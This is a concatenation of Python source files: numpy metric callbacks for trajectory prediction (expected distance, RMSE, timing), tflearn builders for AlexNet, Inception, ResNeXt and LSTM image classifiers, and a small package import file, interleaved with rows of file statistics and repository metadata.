        :param y_true: n_steps, n_agents, 2
        :return: None (appends to ``accumulator`` in place)
        """
        # si, n_agents, 2, n_samples
        difs = y_hats[select_inds, ...] - np.expand_dims(y_true[select_inds, ...], -1)
        dists = np.sqrt((difs ** 2).sum(axis=2))  # si, n_agents, n_samples
        # Probability-weighted average over samples.
        expected_dist = np.einsum('ijk,jk->ij', dists, p)  # si, n_agents
        accumulator.append(expected_dist)

    def reduce_fcn(accumulator):
        """Average the accumulated distances over all agents per timestep."""
        expected_dists = np.concatenate(accumulator, axis=1)  # si, total agents
        return expected_dists.mean(axis=1)

    return init_fcn, accumulate_fcn, reduce_fcn
def get_rmse_by_time_fcns(select_inds=None):
    """Build (init, accumulate, reduce) callbacks for the RMSE of predicted
    positions at selected prediction timesteps.

    Fix: the default ``select_inds`` was a mutable ``np.ndarray`` evaluated
    once at import time (mutable-default pitfall); it is now a ``None``
    sentinel resolved per call, with identical default behavior.

    :param select_inds: integer indices of timesteps to evaluate;
        defaults to ``np.arange(9, 60, 10)``.
    :return: tuple ``(init_fcn, accumulate_fcn, reduce_fcn)``
    """
    if select_inds is None:
        select_inds = np.arange(9, 60, 10)
    init_fcn = lambda: []

    def accumulate_fcn(accumulator, y_hats, p, y_true, **kwargs):
        """Append this example's per-timestep expected squared distances.

        :param accumulator: list of squared distances from previous examples;
            list[i] = (si, n_agents) array
        :param y_hats: n_steps, n_agents, 2, n_samples
        :param p: n_agents, n_samples | probabilities summing to 1
        :param y_true: n_steps, n_agents, 2
        :return: None (appends to ``accumulator`` in place)
        """
        # si, n_agents, 2, n_samples
        difs = y_hats[select_inds, ...] - np.expand_dims(y_true[select_inds, ...], -1)
        dists = (difs ** 2).sum(axis=2)  # si, n_agents, n_samples (squared)
        # Probability-weighted average over samples.
        expected_dist = np.einsum('ijk,jk->ij', dists, p)  # si, n_agents
        accumulator.append(expected_dist)

    def reduce_fcn(accumulator):
        """Root of the mean squared distance over all agents per timestep."""
        expected_dists = np.concatenate(accumulator, axis=1)  # si, total agents
        return np.sqrt(expected_dists.mean(axis=1))

    return init_fcn, accumulate_fcn, reduce_fcn
def get_timing_fcns():
    """Build (init, accumulate, reduce) callbacks that track wall-clock
    duration per example and report the mean duration.

    :return: tuple ``(init_fcn, accumulate_fcn, reduce_fcn)``
    """

    def init_fcn():
        """Start with an empty list of (duration, n_agents) records."""
        return []

    def accumulate_fcn(accumulator, y_hats, p, y_true, duration=np.nan, **kwargs):
        """Record this example's duration and agent count.

        :param accumulator: list of (duration, n_agents) tuples
        :param y_hats: n_steps, n_agents, 2, n_samples
        :param p: n_agents, n_samples | probabilities summing to 1
        :param y_true: n_steps, n_agents, 2
        :param duration: time taken for this example
        :return: None (appends to ``accumulator`` in place)
        """
        n_agents = y_true.shape[1]
        accumulator.append((duration, n_agents))

    def reduce_fcn(accumulator):
        """Mean duration across all accumulated examples."""
        return np.mean([record[0] for record in accumulator])

    return init_fcn, accumulate_fcn, reduce_fcn
| 38.457143
| 86
| 0.638559
| 383
| 2,692
| 4.227154
| 0.18799
| 0.086473
| 0.044472
| 0.048178
| 0.85176
| 0.834466
| 0.834466
| 0.812847
| 0.812847
| 0.812847
| 0
| 0.016248
| 0.245542
| 2,692
| 69
| 87
| 39.014493
| 0.780896
| 0.328752
| 0
| 0.612903
| 0
| 0
| 0.012422
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.290323
| false
| 0
| 0.032258
| 0
| 0.516129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
f2c22bcf5679d8e31efc5de8a95764715388340e
| 42,539
|
py
|
Python
|
v1/models.py
|
deva297/pyassetto
|
cfcf7562bd0da969995bde69983cd86ea52da3e7
|
[
"MIT"
] | null | null | null |
v1/models.py
|
deva297/pyassetto
|
cfcf7562bd0da969995bde69983cd86ea52da3e7
|
[
"MIT"
] | null | null | null |
v1/models.py
|
deva297/pyassetto
|
cfcf7562bd0da969995bde69983cd86ea52da3e7
|
[
"MIT"
] | null | null | null |
# alexnet.py
"""
Copyright 2015 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import tflearn
from tflearn.layers.conv import (
conv_2d,
max_pool_2d,
avg_pool_2d,
conv_3d,
max_pool_3d,
avg_pool_3d,
)
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
from tflearn.layers.normalization import local_response_normalization
from tflearn.layers.merge_ops import merge
def resnext(
    width, height, frame_count, lr, output=9, model_name="sentnet_color.model", n=5
):
    """ResNeXt classifier over ``width x height`` RGB inputs.

    Bug fix: the previous revision referenced an undefined global ``n``
    (NameError as soon as the function was called); the block-repeat count
    is now an explicit keyword parameter. Also normalizes the one stray
    ``tflearn.layers.conv.resnext_block`` call to ``tflearn.resnext_block``
    like the rest of the function.

    :param width: input image width
    :param height: input image height
    :param frame_count: unused; kept for signature compatibility with the
        other model builders in this file
    :param lr: NOTE(review): ignored — the Momentum optimizer below
        hard-codes a 0.1 learning rate; confirm whether ``lr`` should be
        wired through
    :param output: number of output classes (softmax units)
    :param model_name: unused; kept for signature compatibility
    :param n: residual blocks per stage (new parameter, defaults to 5)
    :return: a compiled ``tflearn.DNN`` model
    """
    net = input_data(shape=[None, width, height, 3], name="input")
    net = tflearn.conv_2d(net, 16, 3, regularizer="L2", weight_decay=0.0001)
    net = tflearn.resnext_block(net, n, 16, 32)
    net = tflearn.resnext_block(net, 1, 32, 32, downsample=True)
    net = tflearn.resnext_block(net, n - 1, 32, 32)
    net = tflearn.resnext_block(net, 1, 64, 32, downsample=True)
    net = tflearn.resnext_block(net, n - 1, 64, 32)
    net = tflearn.batch_normalization(net)
    net = tflearn.activation(net, "relu")
    net = tflearn.global_avg_pool(net)
    # Softmax classification head.
    net = tflearn.fully_connected(net, output, activation="softmax")
    opt = tflearn.Momentum(0.1, lr_decay=0.1, decay_step=32000, staircase=True)
    net = tflearn.regression(net, optimizer=opt, loss="categorical_crossentropy")
    model = tflearn.DNN(
        net, max_checkpoints=0, tensorboard_verbose=0, tensorboard_dir="log"
    )
    return model
def sentnet_color_2d(
    width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
    """AlexNet-style 2-D convolutional classifier over RGB frames.

    :param width: input image width
    :param height: input image height
    :param frame_count: unused; kept for signature compatibility
    :param lr: learning rate passed to the regression layer
    :param output: number of output classes (softmax units)
    :param model_name: unused here; kept for signature compatibility
    :return: a compiled ``tflearn.DNN`` model
    """
    net = input_data(shape=[None, width, height, 3], name="input")
    # First conv stage.
    net = conv_2d(net, 96, 11, strides=4, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 256, 5, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 256, 3, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    # Second conv stage (repeats the 5x5 / 3x3 pattern).
    net = conv_2d(net, 256, 5, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 256, 3, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    # Four identical fully-connected + dropout stages.
    for _ in range(4):
        net = fully_connected(net, 4096, activation="tanh")
        net = dropout(net, 0.5)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net, max_checkpoints=0, tensorboard_verbose=0, tensorboard_dir="log"
    )
def _inception_block_2d(
    incoming, prefix, n_1x1, n_3x3_reduce, n_3x3, n_5x5_reduce, n_5x5, n_pool_proj
):
    """Build one GoogLeNet-style 2-D inception module.

    Four parallel branches (1x1 conv; 1x1-reduce + 3x3 conv; 1x1-reduce +
    5x5 conv; 3x3 max-pool + 1x1 projection) concatenated on the channel
    axis. All convolutions use ReLU activations.

    :param incoming: input tensor
    :param prefix: layer-name prefix, e.g. ``"inception_3a"``
    :param n_*: filter counts for each branch
    :return: merged output tensor
    """
    branch_1x1 = conv_2d(
        incoming, n_1x1, filter_size=1, activation="relu", name=prefix + "_1_1"
    )
    reduce_3x3 = conv_2d(
        incoming, n_3x3_reduce, filter_size=1, activation="relu",
        name=prefix + "_3_3_reduce",
    )
    branch_3x3 = conv_2d(
        reduce_3x3, n_3x3, filter_size=3, activation="relu", name=prefix + "_3_3"
    )
    reduce_5x5 = conv_2d(
        incoming, n_5x5_reduce, filter_size=1, activation="relu",
        name=prefix + "_5_5_reduce",
    )
    branch_5x5 = conv_2d(
        reduce_5x5, n_5x5, filter_size=5, activation="relu", name=prefix + "_5_5"
    )
    branch_pool = max_pool_2d(incoming, kernel_size=3, strides=1, name=prefix + "_pool")
    branch_pool = conv_2d(
        branch_pool, n_pool_proj, filter_size=1, activation="relu",
        name=prefix + "_pool_1_1",
    )
    # Concatenate along the channel axis (axis 3 for NHWC tensors).
    return merge(
        [branch_1x1, branch_3x3, branch_5x5, branch_pool],
        mode="concat",
        axis=3,
        name=prefix + "_output",
    )


def inception_v3(
    width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
    """GoogLeNet/Inception-style 2-D classifier over RGB frames.

    Fixes vs. the previous revision:
    - ``inception_4b``'s 1x1 branch was misnamed ``"inception_4a_1_1"``
      (copy-paste), colliding with the 4a module's layer name.
    - ``inception_3b``'s 5x5 branch was missing ``activation="relu"`` and
      silently fell back to a linear activation, unlike every other branch.
    - the nine hand-expanded inception modules are collapsed into
      ``_inception_block_2d`` with their channel counts tabulated.

    :param width: input image width
    :param height: input image height
    :param frame_count: unused; kept for signature compatibility
    :param lr: learning rate passed to the regression layer
    :param output: number of output classes (softmax units)
    :param model_name: unused here; kept for signature compatibility
    :return: a compiled ``tflearn.DNN`` model
    """
    network = input_data(shape=[None, width, height, 3], name="input")
    # Stem: conv + pool + LRN, then 1x1-reduce + 3x3 conv + LRN + pool.
    conv1 = conv_2d(network, 64, 7, strides=2, activation="relu", name="conv1_7_7_s2")
    pool1 = max_pool_2d(conv1, 3, strides=2)
    pool1 = local_response_normalization(pool1)
    conv2_reduce = conv_2d(pool1, 64, 1, activation="relu", name="conv2_3_3_reduce")
    conv2 = conv_2d(conv2_reduce, 192, 3, activation="relu", name="conv2_3_3")
    conv2 = local_response_normalization(conv2)
    net = max_pool_2d(conv2, kernel_size=3, strides=2, name="pool2_3_3_s2")
    # Module args: (prefix, 1x1, 3x3-reduce, 3x3, 5x5-reduce, 5x5, pool-proj)
    net = _inception_block_2d(net, "inception_3a", 64, 96, 128, 16, 32, 32)
    net = _inception_block_2d(net, "inception_3b", 128, 128, 192, 32, 96, 64)
    net = max_pool_2d(net, kernel_size=3, strides=2, name="pool3_3_3")
    net = _inception_block_2d(net, "inception_4a", 192, 96, 208, 16, 48, 64)
    net = _inception_block_2d(net, "inception_4b", 160, 112, 224, 24, 64, 64)
    net = _inception_block_2d(net, "inception_4c", 128, 128, 256, 24, 64, 64)
    net = _inception_block_2d(net, "inception_4d", 112, 144, 288, 32, 64, 64)
    net = _inception_block_2d(net, "inception_4e", 256, 160, 320, 32, 128, 128)
    net = max_pool_2d(net, kernel_size=3, strides=2, name="pool_3_3")
    net = _inception_block_2d(net, "inception_5a", 256, 160, 320, 32, 128, 128)
    net = _inception_block_2d(net, "inception_5b", 384, 192, 384, 48, 128, 128)
    # Head: global average pool, dropout, softmax classifier.
    net = avg_pool_2d(net, kernel_size=7, strides=1)
    net = dropout(net, 0.4)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net, max_checkpoints=0, tensorboard_verbose=0, tensorboard_dir="log"
    )
def _inception_block_3d(
    incoming, prefix, n_1x1, n_3x3_reduce, n_3x3, n_5x5_reduce, n_5x5, n_pool_proj
):
    """Build one GoogLeNet-style 3-D inception module.

    Same four-branch layout as the 2-D variant, using 3-D convolutions and
    pooling; branches are concatenated on axis 4 (the channel axis of the
    5-D ``[batch, w, h, d, c]`` tensors). All convolutions use ReLU.

    :param incoming: input tensor
    :param prefix: layer-name prefix, e.g. ``"inception_3a"``
    :param n_*: filter counts for each branch
    :return: merged output tensor
    """
    branch_1x1 = conv_3d(
        incoming, n_1x1, filter_size=1, activation="relu", name=prefix + "_1_1"
    )
    reduce_3x3 = conv_3d(
        incoming, n_3x3_reduce, filter_size=1, activation="relu",
        name=prefix + "_3_3_reduce",
    )
    branch_3x3 = conv_3d(
        reduce_3x3, n_3x3, filter_size=3, activation="relu", name=prefix + "_3_3"
    )
    reduce_5x5 = conv_3d(
        incoming, n_5x5_reduce, filter_size=1, activation="relu",
        name=prefix + "_5_5_reduce",
    )
    branch_5x5 = conv_3d(
        reduce_5x5, n_5x5, filter_size=5, activation="relu", name=prefix + "_5_5"
    )
    branch_pool = max_pool_3d(incoming, kernel_size=3, strides=1, name=prefix + "_pool")
    branch_pool = conv_3d(
        branch_pool, n_pool_proj, filter_size=1, activation="relu",
        name=prefix + "_pool_1_1",
    )
    return merge(
        [branch_1x1, branch_3x3, branch_5x5, branch_pool],
        mode="concat",
        axis=4,
        name=prefix + "_output",
    )


def inception_v3_3d(
    width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
    """GoogLeNet/Inception-style 3-D classifier over single-channel volumes
    of shape ``[width, height, 3]``.

    Local response normalization is intentionally omitted (it was commented
    out in the previous revision — tflearn's LRN is 2-D only).

    Fixes vs. the previous revision (same copy-paste bugs as the 2-D model):
    - ``inception_4b``'s 1x1 branch was misnamed ``"inception_4a_1_1"``.
    - ``inception_3b``'s 5x5 branch was missing ``activation="relu"``.
    - the nine hand-expanded inception modules are collapsed into
      ``_inception_block_3d`` with their channel counts tabulated.

    :param width: input volume width
    :param height: input volume height
    :param frame_count: unused; kept for signature compatibility
    :param lr: learning rate passed to the regression layer
    :param output: number of output classes (softmax units)
    :param model_name: checkpoint path for the resulting ``tflearn.DNN``
    :return: a compiled ``tflearn.DNN`` model
    """
    network = input_data(shape=[None, width, height, 3, 1], name="input")
    # Stem: conv + pool, then 1x1-reduce + 3x3 conv + pool.
    conv1 = conv_3d(network, 64, 7, strides=2, activation="relu", name="conv1_7_7_s2")
    pool1 = max_pool_3d(conv1, 3, strides=2)
    conv2_reduce = conv_3d(pool1, 64, 1, activation="relu", name="conv2_3_3_reduce")
    conv2 = conv_3d(conv2_reduce, 192, 3, activation="relu", name="conv2_3_3")
    net = max_pool_3d(conv2, kernel_size=3, strides=2, name="pool2_3_3_s2")
    # Module args: (prefix, 1x1, 3x3-reduce, 3x3, 5x5-reduce, 5x5, pool-proj)
    net = _inception_block_3d(net, "inception_3a", 64, 96, 128, 16, 32, 32)
    net = _inception_block_3d(net, "inception_3b", 128, 128, 192, 32, 96, 64)
    net = max_pool_3d(net, kernel_size=3, strides=2, name="pool3_3_3")
    net = _inception_block_3d(net, "inception_4a", 192, 96, 208, 16, 48, 64)
    net = _inception_block_3d(net, "inception_4b", 160, 112, 224, 24, 64, 64)
    net = _inception_block_3d(net, "inception_4c", 128, 128, 256, 24, 64, 64)
    net = _inception_block_3d(net, "inception_4d", 112, 144, 288, 32, 64, 64)
    net = _inception_block_3d(net, "inception_4e", 256, 160, 320, 32, 128, 128)
    net = max_pool_3d(net, kernel_size=3, strides=2, name="pool_3_3")
    net = _inception_block_3d(net, "inception_5a", 256, 160, 320, 32, 128, 128)
    net = _inception_block_3d(net, "inception_5b", 384, 192, 384, 48, 128, 128)
    # Head: global average pool, dropout, softmax classifier.
    net = avg_pool_3d(net, kernel_size=7, strides=1)
    net = dropout(net, 0.4)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net,
        checkpoint_path=model_name,
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
def sentnet_LSTM_gray(width, height, frame_count, lr, output=9):
    """Two-layer LSTM classifier over grayscale frame sequences.

    Bug fix: the final fully-connected layer was hard-coded to 9 units,
    silently ignoring the ``output`` parameter; it now uses ``output``
    (default 9, so default behavior is unchanged).

    :param width: sequence length dimension of the input
    :param height: feature dimension of the input
    :param frame_count: unused; kept for signature compatibility
    :param lr: NOTE(review): ignored — the regression layer below does not
        receive a learning_rate; confirm whether ``lr`` should be wired in
    :param output: number of output classes (softmax units)
    :return: a compiled ``tflearn.DNN`` model
    """
    network = input_data(shape=[None, width, height], name="input")
    network = tflearn.lstm(network, 128, return_seq=True)
    network = tflearn.lstm(network, 128)
    network = tflearn.fully_connected(network, output, activation="softmax")
    network = tflearn.regression(
        network, optimizer="adam", loss="categorical_crossentropy", name="output1"
    )
    model = tflearn.DNN(
        network,
        checkpoint_path="model_lstm",
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
    return model
def sentnet_color(
    width, height, frame_count, lr, output=9, model_name="sentnet_color.model"
):
    """AlexNet-style 3D conv net over color input (RGB as the depth axis).

    NOTE(review): `frame_count` is accepted but unused — the input depth is
    fixed at 3 (color channels); confirm against callers.

    Returns a compiled tflearn DNN checkpointed under `model_name`.
    """
    net = input_data(shape=[None, width, height, 3, 1], name="input")
    # Convolutional trunk: conv/pool stages followed by a 384-384-256 stack,
    # then the same deeper pattern repeated once more.
    net = conv_3d(net, 96, 11, strides=4, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 256, 5, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 256, 3, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 256, 5, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 256, 3, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    # Classifier head: four 4096-unit tanh layers, each with 50% dropout.
    for _ in range(4):
        net = fully_connected(net, 4096, activation="tanh")
        net = dropout(net, 0.5)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net,
        checkpoint_path=model_name,
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
def sentnet_frames(width, height, frame_count, lr, output=9):
    """AlexNet-style 3D conv net over a stack of `frame_count` frames.

    Input shape is [None, width, height, frame_count, 1]; returns a
    compiled tflearn DNN checkpointed under "model_alexnet".
    """
    net = input_data(shape=[None, width, height, frame_count, 1], name="input")
    # Convolutional trunk (two passes of the conv/pool pattern).
    net = conv_3d(net, 96, 11, strides=4, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 256, 5, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 256, 3, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 256, 5, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 256, 3, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    # Four 4096-unit tanh layers with dropout, then the softmax head.
    for _ in range(4):
        net = fully_connected(net, 4096, activation="tanh")
        net = dropout(net, 0.5)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net,
        checkpoint_path="model_alexnet",
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
def sentnet2(width, height, frame_count, lr, output=9):
    """Shorter AlexNet-style 3D conv net (single conv trunk, two FC layers).

    Fixes an ignored parameter: the softmax head was hard-coded to 3
    units while the signature advertises `output=9`; every sibling
    builder in this file sizes the head from `output`, so this one now
    does too. Callers that relied on the silent 3-unit head must pass
    output=3 explicitly.

    Returns a compiled tflearn DNN checkpointed under "model_alexnet".
    """
    network = input_data(shape=[None, width, height, frame_count, 1], name="input")
    network = conv_3d(network, 96, 11, strides=4, activation="relu")
    network = max_pool_3d(network, 3, strides=2)
    # network = local_response_normalization(network)
    network = conv_3d(network, 256, 5, activation="relu")
    network = max_pool_3d(network, 3, strides=2)
    # network = local_response_normalization(network)
    network = conv_3d(network, 384, 3, activation="relu")
    network = conv_3d(network, 384, 3, activation="relu")
    network = conv_3d(network, 256, 3, activation="relu")
    network = max_pool_3d(network, 3, strides=2)
    # network = local_response_normalization(network)
    network = fully_connected(network, 4096, activation="tanh")
    network = dropout(network, 0.5)
    network = fully_connected(network, 4096, activation="tanh")
    network = dropout(network, 0.5)
    # Size the head from the caller-supplied class count (was hard-coded 3).
    network = fully_connected(network, output, activation="softmax")
    network = regression(
        network,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    model = tflearn.DNN(
        network,
        checkpoint_path="model_alexnet",
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
    return model
def sentnet(width, height, frame_count, lr, output=9):
    """AlexNet-style 3D conv net using mostly average pooling.

    Identical layout to `sentnet_frames` except all but one pooling stage
    is avg_pool_3d. Returns a compiled tflearn DNN checkpointed under
    "model_alexnet".
    """
    net = input_data(shape=[None, width, height, frame_count, 1], name="input")
    net = conv_3d(net, 96, 11, strides=4, activation="relu")
    net = avg_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 256, 5, activation="relu")
    net = avg_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 256, 3, activation="relu")
    net = max_pool_3d(net, 3, strides=2)  # the single max-pool stage
    net = conv_3d(net, 256, 5, activation="relu")
    net = avg_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 384, 3, activation="relu")
    net = conv_3d(net, 256, 3, activation="relu")
    net = avg_pool_3d(net, 3, strides=2)
    # Deep fully-connected head: four 4096-unit tanh layers with dropout.
    for _ in range(4):
        net = fully_connected(net, 4096, activation="tanh")
        net = dropout(net, 0.5)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net,
        checkpoint_path="model_alexnet",
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
def alexnet2(width, height, lr, output=3):
    """Extended 2D AlexNet variant with local response normalization.

    Input is [None, width, height, 1] (grayscale); returns a compiled
    tflearn DNN checkpointed under "model_alexnet".
    """
    net = input_data(shape=[None, width, height, 1], name="input")
    # First conv/pool/LRN pass plus the 384-384-256 stack.
    net = conv_2d(net, 96, 11, strides=4, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 256, 5, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 256, 3, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    # Second pass repeats the pattern (no LRN after the first pool here).
    net = conv_2d(net, 256, 5, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 256, 3, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    # Classifier head: four 4096-unit tanh layers with 50% dropout.
    for _ in range(4):
        net = fully_connected(net, 4096, activation="tanh")
        net = dropout(net, 0.5)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net,
        checkpoint_path="model_alexnet",
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
def sentnet_v0(width, height, frame_count, lr, output=9):
    """Original (v0) 3D conv net: single conv trunk, two FC layers.

    Returns a compiled tflearn DNN checkpointed under "model_alexnet".
    """
    net = input_data(shape=[None, width, height, frame_count, 1], name="input")
    net = conv_3d(net, 96, 11, strides=4, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    net = conv_3d(net, 256, 5, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    # NOTE(review): the extra positional 3 below lands in conv_3d's strides
    # slot, unlike the sibling builders — preserved as-is; confirm intent.
    net = conv_3d(net, 384, 3, 3, activation="relu")
    net = conv_3d(net, 384, 3, 3, activation="relu")
    net = conv_3d(net, 256, 3, 3, activation="relu")
    net = max_pool_3d(net, 3, strides=2)
    # Two 4096-unit tanh layers with dropout, then the softmax head.
    for _ in range(2):
        net = fully_connected(net, 4096, activation="tanh")
        net = dropout(net, 0.5)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net,
        checkpoint_path="model_alexnet",
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
def alexnet(width, height, lr, output=3):
    """Classic 2D AlexNet over grayscale input [None, width, height, 1].

    Returns a compiled tflearn DNN checkpointed under "model_alexnet".
    """
    net = input_data(shape=[None, width, height, 1], name="input")
    net = conv_2d(net, 96, 11, strides=4, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 256, 5, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 384, 3, activation="relu")
    net = conv_2d(net, 256, 3, activation="relu")
    net = max_pool_2d(net, 3, strides=2)
    net = local_response_normalization(net)
    # Two 4096-unit tanh layers with dropout, then the softmax head.
    for _ in range(2):
        net = fully_connected(net, 4096, activation="tanh")
        net = dropout(net, 0.5)
    net = fully_connected(net, output, activation="softmax")
    net = regression(
        net,
        optimizer="momentum",
        loss="categorical_crossentropy",
        learning_rate=lr,
        name="targets",
    )
    return tflearn.DNN(
        net,
        checkpoint_path="model_alexnet",
        max_checkpoints=1,
        tensorboard_verbose=0,
        tensorboard_dir="log",
    )
| 30.515782
| 88
| 0.644115
| 5,678
| 42,539
| 4.429553
| 0.036104
| 0.095742
| 0.080156
| 0.113793
| 0.94374
| 0.935867
| 0.929903
| 0.919765
| 0.919765
| 0.903105
| 0
| 0.083362
| 0.251863
| 42,539
| 1,393
| 89
| 30.537688
| 0.706929
| 0.040598
| 0
| 0.708
| 0
| 0
| 0.106626
| 0.036637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0096
| false
| 0
| 0.0048
| 0
| 0.024
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b362733980e488b6d5a98d98aa88dfc9b36c431
| 176
|
py
|
Python
|
mdde/core/mdde/registry/protocol/__init__.py
|
akharitonov/mdde
|
b0443f3c9c3ca948e9dda213572926087c214d8d
|
[
"MIT"
] | 1
|
2021-05-17T11:17:51.000Z
|
2021-05-17T11:17:51.000Z
|
mdde/core/mdde/registry/protocol/__init__.py
|
akharitonov/mdde
|
b0443f3c9c3ca948e9dda213572926087c214d8d
|
[
"MIT"
] | 4
|
2020-05-30T12:23:04.000Z
|
2021-12-25T12:59:14.000Z
|
mdde/core/mdde/registry/protocol/__init__.py
|
akharitonov/mdde
|
b0443f3c9c3ca948e9dda213572926087c214d8d
|
[
"MIT"
] | null | null | null |
from .p_registry_client_control import PRegistryControlClient
from .p_registry_client_read import PRegistryReadClient
from .p_registry_client_write import PRegistryWriteClient
| 44
| 61
| 0.914773
| 21
| 176
| 7.238095
| 0.52381
| 0.098684
| 0.256579
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068182
| 176
| 3
| 62
| 58.666667
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
